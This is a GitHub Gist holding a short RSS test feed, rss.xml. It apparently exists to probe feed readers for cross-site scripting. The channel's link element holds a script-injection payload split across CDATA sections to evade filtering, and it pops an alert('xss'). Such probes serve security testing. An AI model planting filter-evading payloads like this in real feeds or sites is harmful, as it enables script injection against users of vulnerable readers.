Created
October 29, 2022 19:24
-
-
Save MikeeI/4db61bdfe0a52e23c7cec102c3554313 to your computer and use it in GitHub Desktop.
rss.xml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>RSS Test</title> | |
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link> | |
<description>RSS Test Description</description> | |
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate> | |
<item> | |
<title>RSS Test</title> | |
<link>http://example.com</link> | |
<description>a post</description> | |
<author>[email protected]</author> | |
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate> | |
</item> | |
</channel> | |
</rss> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment